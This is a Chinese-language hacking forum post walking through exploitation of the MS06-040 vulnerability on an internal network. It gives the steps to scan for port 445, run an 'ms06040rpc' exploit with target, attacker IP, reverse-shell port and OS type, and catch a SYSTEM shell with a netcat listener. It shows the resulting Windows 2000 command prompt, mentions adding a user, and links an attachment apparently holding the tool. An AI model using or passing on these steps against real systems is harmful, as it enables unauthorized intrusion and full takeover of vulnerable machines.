ms06040漏洞的利用

原始连接
http://forum.eviloctal.com/read-htm-tid-24303.html

文章作者：fhod

首先我们在内网扫描开放了445端口的机器.
扫描这里我用superscan..

扫描这个网段所有开放了445的机器

172.28.51.1

之前我已经扫到过一个存在漏洞的机子了.
172.28.51.28就是这一个

ms06040rpc 172.28.51.28 172.28.51.223 1234 1

172.28.51.28是存在漏洞的主机. 172.28.51.223是我本机 1234是溢出反弹的端口 1为操作系统类型

<os type(1/2)>:
          1: win 2000sp4 2:win xpsp1


我们另开一个窗口
nc -l -v -p 1234

监听1234端口

然后来到另一个CMD


C:\>nc -l -v -p 1234
listening on [any] 1234 ...
connect to [172.28.51.223] from POSTRATOR [172.28.51.28] 1474
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

看到这个就说明成功了..我们来看下权限

用户添加成功..系统权限..


完毕!!!!

后来我在测试的漏洞机netstat -an发现端口连接的是139..看下

172.28.51.28:139     172.28.51.223:1160   ESTABLISHED

139...我想扫描开放139端口也是可以溢出的..可以试一下..

bye~~~~~

附件下载:

http://forum.eviloctal.com/job-htm-action-download-pid-tpc-tid-24303-aid-7297.html